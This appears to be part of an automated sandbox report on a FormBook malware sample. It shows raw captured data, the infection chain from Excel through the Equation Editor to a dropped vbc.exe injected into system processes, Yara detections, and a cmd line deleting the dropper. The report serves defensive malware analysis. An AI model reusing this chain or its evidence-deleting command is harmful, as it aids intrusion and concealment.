45 22 b7 b4 a3 90 3b 8f c8 35 eb 5b 59 ae 80 25 67 8a 69 1a 7d e9 5c 2c 34 91 9f d4 59 bf 3a 3d 9e f5 d3 ad 02 11 e5 19 75 2b 60 ab 54 1f 3e 40 60 91 9f c1 63 13 4d 9a 6e bf 46 5e 94 8f a5 c8 95 3c 53 33 e2 00 07 f0 c3 ad cf 4a 84 ac 63 da 8a 9d ae 41 d1 aa 58 ae 6b 33 01 64 7f 01 ec 28 0d d5 57 96 c9 40 ec f8 93 aa f8
                  Data Ascii: L]U9>$F8bAoy3n$gq2QY{r,`A1xKX~/LE";5[Y%gi}\,4:=iTa>j(|*f=1Vrrj0$UO3d()_|&A|7~Bk9@.T\!d)mJ6K~rt0grA?ljEUj8kLSEQ8V)x'M$J?T#MH8+9/]_[1^=GTd\f*p)e_C-PS0:KdYM(YvT~*/3udJ`S9tq'uxXOBAEl&oQ@;'g(vIBN6z5^T3q.@w|u`CVhp~wdqOa0YG<eP3mu5xc&\a"8KdfSxE>[2J$Ubwa=m88v nTLe'W6(,Wd6Wb?wdiQ=JL\+v8B.SGRuA+l}ig'-A, 8~,qDYc^KN[bq.IM&e>h9ZX:XTI{4-a8h@3}#LE";5[Y%gi}\,4Y:=u+`T>@`cMnF^<S3JcAXk3d(W@


                  Code Manipulations

                  Statistics

                  Behavior

                  Click to jump to process

                  System Behavior

                  Analysis Process: EXCEL.EXE PID: 1552 Parent PID: 584

                  General

                  Start time:07:42:52
                  Start date:19/11/2020
                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  Wow64 process (32bit):false
                  Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                  Imagebase:0x13ff00000
                  File size:27641504 bytes
                  MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Analysis Process: EQNEDT32.EXE PID: 2408 Parent PID: 584

                  General

                  Start time:07:43:12
                  Start date:19/11/2020
                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Wow64 process (32bit):true
                  Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                  Imagebase:0x400000
                  File size:543304 bytes
                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Analysis Process: vbc.exe PID: 2692 Parent PID: 2408

                  General

                  Start time:07:43:15
                  Start date:19/11/2020
                  Path:C:\Users\Public\vbc.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Users\Public\vbc.exe'
                  Imagebase:0x400000
                  File size:61440 bytes
                  MD5 hash:C05EEE88F0B57E853996957D6523397B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Visual Basic
                  Reputation:low

                  Analysis Process: vbc.exe PID: 2868 Parent PID: 2692

                  General

                  Start time:07:44:20
                  Start date:19/11/2020
                  Path:C:\Users\Public\vbc.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Users\Public\vbc.exe'
                  Imagebase:0x400000
                  File size:61440 bytes
                  MD5 hash:C05EEE88F0B57E853996957D6523397B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:low

                  Analysis Process: explorer.exe PID: 1388 Parent PID: 2868

                  General

                  Start time:07:44:35
                  Start date:19/11/2020
                  Path:C:\Windows\explorer.exe
                  Wow64 process (32bit):false
                  Commandline:
                  Imagebase:0xffca0000
                  File size:3229696 bytes
                  MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate

                  Analysis Process: autoconv.exe PID: 1664 Parent PID: 1388

                  General

                  Start time:07:44:45
                  Start date:19/11/2020
                  Path:C:\Windows\SysWOW64\autoconv.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\SysWOW64\autoconv.exe
                  Imagebase:0xa90000
                  File size:679424 bytes
                  MD5 hash:09D786401F6CA6AEB16B2811B169F944
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate

                  Analysis Process: NAPSTAT.EXE PID: 1840 Parent PID: 1388

                  General

                  Start time:07:44:45
                  Start date:19/11/2020
                  Path:C:\Windows\SysWOW64\NAPSTAT.EXE
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\NAPSTAT.EXE
                  Imagebase:0x960000
                  File size:279552 bytes
                  MD5 hash:4AF92E1821D96E4178732FC04D8FD69C
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000009.00000002.2382070172.0000000000553000.00000004.00000020.sdmp, Author: Florian Roth
                  Reputation:moderate

                  Analysis Process: cmd.exe PID: 2168 Parent PID: 1840

                  General

                  Start time:07:44:49
                  Start date:19/11/2020
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:/c del 'C:\Users\Public\vbc.exe'
                  Imagebase:0x4a920000
                  File size:302592 bytes
                  MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Disassembly

                  Code Analysis

                  Reset < >